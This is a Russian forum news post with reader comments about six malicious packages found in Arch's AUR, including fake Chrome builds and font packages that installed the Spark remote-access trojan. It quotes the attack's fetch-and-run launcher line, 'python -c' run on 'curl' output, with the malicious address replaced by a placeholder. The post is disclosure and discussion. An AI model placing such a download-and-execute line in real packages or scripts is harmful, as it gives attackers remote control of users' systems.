LINUX.ORG.RU

В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

 , , ,


1

3

В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.

>>> Подробности

★★★★★

Проверено: leave ()
Последнее исправление: leave (всего исправлений: 1)

В почти бесконтрольной репе выявлены очередные 6 вредоносных пакетов.

Тащем-то это неизбежно будет происходить на любом ресурсе с пост-модерацией.

Camel ★★★★★
()
Ответ на: комментарий от LightDiver

Репы с пост-модерацией не были массовыми. Через пре-модерацию такие откровенные закладки не проскочили бы.

Camel ★★★★★
()

Админы молодцы, конечно. Спасибо им. Ох неблагодарная у них работа.

R_He_Po6oT ★★★★★
()
Ответ на: комментарий от Camel

А в премодерацию входила бы проверка каждого изменения и каждого стороннего файла загружаемого? Представляешь себе объём?

R_He_Po6oT ★★★★★
()
Ответ на: комментарий от R_He_Po6oT

Представляешь себе объём?

вот и пришла расплата за неконтролируемую помойку «всегда свежего софта»

daminatorus ★★
()
Ответ на: комментарий от daminatorus

Не всегда свежего, а пакетов формируемых из произвольных данных сторонними людьми. В репах Арча пакеты от доверенных (более менее) людей. А в ауре их делает кто хочет. Некоторые пакеты даже собираются не из гитов оригинальных проектов, а из форклв,где хозяин волен поместить что угодно. Даже не надо левых скриптов в pkgbuild качать. Нет, не все шпионы, конечно, люди так делают из других соображений. Но в таком юардаке легко затеряться и начать гадить.

Не свежие пакеты виноваты, а те, кто искажает смысл существования aur. Будет жаль, когда его закроют.

R_He_Po6oT ★★★★★
()
Ответ на: комментарий от R_He_Po6oT

Ну так да, в этом суть. Поэтому репы с пост-модерацией такие большие и так быстро получают обновления.

Camel ★★★★★
()
Ответ на: комментарий от Camel

Такое происходит даже на ресурсах с пре-модерацией.

Behem0th ★★★★★
()

Так браузеры и есть вредоносное ПО, я же правильно понимаю?

mittorn ★★★★★
()
Ответ на: комментарий от R_He_Po6oT

Есть ещё какой-то модный аналог AUR, недавно был упомянут в опросе. Не могу вспомнить.

Нет, это было про chaotic-aur.

knovich ★★
()
Последнее исправление: knovich (всего исправлений: 1)

Т.е. хром и шрифты к нему в зоне риска.

dmitry237 ★★★★★
()

Ну так Рач же. В принципе, ничего удивительного. Хотя нет, удивительно, что так долго держались. Впрочем, ещё не факт, что держались, это ж только то, что нашли — а может ещё и не найденного там навалом.

Smacker ★★★★★
()

Черным по белому написано «осматривайте PKGBUILD», «AUR никто не мониторит». Это всё равно, что жаловаться на вредонос в скачанном с рандомного гитхаб репозитория скрипте.

ac130kz ★★★
()
Ответ на: комментарий от ac130kz

Черным по белому написано «осматривайте PKGBUILD», «AUR никто не мониторит».

Проще поставить дебиан и перестать заниматься фигней :) Ну или федору, например. Тут уж кому что больше нравится.

DrRulez ★★★★★
()

Да кого волнуют компы всяких красноглазиков… У взрослых людей системы на убунте.

seiken ★★★★★
()
Ответ на: комментарий от DrRulez

Я на дебиан тоже могу скачать с гитхаба скрипт, и сказать, что у меня данные увели. Просто у кого-то есть глаза прочитать дисклеймер неофициального (!) пользовательского (!) репозитория, а у кого-то они отсутствуют.

ac130kz ★★★
()

Клоака. Ничего удивительного.

Gonzo ★★★★★
()
Ответ на: комментарий от seiken

Это та, которая через.. снап... работает? С бубнами , чтобы поставить старый драйвер на нвидию на новое ядро? Это то, что разваливается после обновления? Это там, где не АУР, а ППА? Взрослые люди выбирали Убунту версии до 16-18-й максимум.

Jeronimo ★★★
()
Ответ на: комментарий от DrRulez

Вот ниразу не проще. Я конечно не на арче, но версии софта дебиана угнетают меня просто своим существованием. Этим же нельзя реально пользоваться. Федору еще можно глянуть, но там свои нюансы.

LightDiver ★★★★★
()
Ответ на: комментарий от seiken

Тогда к чему сравнение про арч и убунту сервер? Арч априори не про сервер, а про десктоп. Ты не отрицаешь нужность десктопа? Как десктоп арч лучше убунты, это факт. Я это имел ввиду.Й Ты уж извини, что я со своим рылом к серьезным дядькам с серверами залез неподумавши.

Jeronimo ★★★
()

Маловато как-то. Плохо искали, видимо

Linuxoid85
()
Ответ на: комментарий от Jeronimo

Ты не отрицаешь нужность десктопа?

смотря какого десктопа. Если того, который используется для разработки для серьёзных дядь, зачастую удобнее иметь одинаковый дистр и на серваке, и на десктопе.

seiken ★★★★★
()
Ответ на: комментарий от DrRulez

Проще поставить дебиан и перестать заниматься фигней

…потому что даже если очень захочется, то окажется, что фигня под дебиан или устаревшая, или не в репах, или не работает.

thesis ★★★★★
()
Ответ на: комментарий от thesis

Так всегда в репе что-то устаревает. Не обновляют дистр с каждой новой версией.

seiken ★★★★★
()
Ответ на: комментарий от ac130kz

Я на дебиан тоже могу скачать с гитхаба скрипт, и сказать, что у меня данные увели. Просто у кого-то есть глаза прочитать дисклеймер неофициального (!) пользовательского (!) репозитория

Так с гитхаба, или с репозитария? ты уж определись как-бэ. Это я про дебиан, если что.

DrRulez ★★★★★
()
Ответ на: комментарий от Jeronimo

Арч априори не про сервер, а про десктоп.

Ась? Какой такой павлин-мавлин?

Ты не отрицаешь нужность десктопа?

Как до луны - одним местом. Любому линукс-дистрибутиву. Проще говоря в том виде, в котором он сейчас - он - даром не нужен и нормальным людям - не уперся. Причин - масса и не один раз они были озвучены.

Как десктоп арч лучше убунты, это факт.

Они оба-два - барахло.

Ты уж извини, что я со своим рылом к серьезным дядькам с серверами залез неподумавши.

Вот и подумай в следующий раз….

DrRulez ★★★★★
()
Ответ на: комментарий от DrRulez

Очень не хватало экспертного мнения. Особенно твоего.

даром не нужен и нормальным людям - не уперся.

Ты то же, конечно, нормальный, не то, что эти, другие.

Jeronimo ★★★
()
Ответ на: комментарий от thesis

…потому что даже если очень захочется, то окажется, что фигня под дебиан или устаревшая, или не в репах, или не работает.

Банальные голословные утверждения.

DrRulez ★★★★★
()
Ответ на: комментарий от steemandlinux

Пользователь: rsload Пароль: rsload

Ты оттуда еще что-то качаешь ? О_О

DrRulez ★★★★★
()
Ответ на: комментарий от Jeronimo

Очень не хватало экспертного мнения. Особенно твоего.

Конечно. Ты обращайся. Не стесняйся. Первое обращение-бесплатно ! :)

Ты то же, конечно, нормальный, не то, что эти, другие.

Конечно. Ты разве не знал ? :)

DrRulez ★★★★★
()

«Байзэвэй, у вас вирусня» - теперь будет популярным слоганом.

Desmond_Hume ★★★★★
()
Ответ на: комментарий от DrRulez

Конечно. Ты обращайся. Не стесняйся. Первое обращение-бесплатно ! :)

Нет, спасибо. Ведь «Еврипида, колупающий в носу, мудрецу подобен». Обойдусь.

Jeronimo ★★★
()
Ответ на: комментарий от LightDiver

Нормально всё в дебиане, не выдумывай. Можно даже и oldoldstable использовать и всё будет норм. А на цифры просто не смотри.

firkax ★★★★★
()

Не ну я не знаю. Ну есть же винда, ну тиранте виндузятников… Ну что за свинство!?

UriZzz ★★
()
Ответ на: комментарий от firkax

Да я бы не смотрел, но попробуй поюзать модули питона те же в дебиане. Как то тут смотрели, там самое новое было из года этак 19-21, что уже несколько лет как устарело и не поддерживается. И так во многом.

А значит, надо ставить стороннее, а тогда смысл в этом всем? Это просто один пример.

Сейчас многое развивается гораздо быстрее, чем за всем этим поспевают релизныые дистрибутивы.

LightDiver ★★★★★
()

Ставьте клоуна, если целенаправленно искали вирусы в aur

xMblTiSHix
()

в котором среди прочего присутствовала команда ‘python -c "$(curl вредоносная ссылка)"’

и очень извиняюсь, но зойчем тут питон? напрямую из шелл-скрипта курл никак не запустить?
кстати, курл в зависимостях пакета есть? а то ведь его может и не быть в системе - вот это будет прикол!

PerdunJamesBond ★★
()
Ответ на: комментарий от thesis

Чотам, какой версии кеды в стабильном демьяне?

А мне - героически наплевать, «какие там кеды». Потому как на серверах они мне не нужны от слова совсем.

DrRulez ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.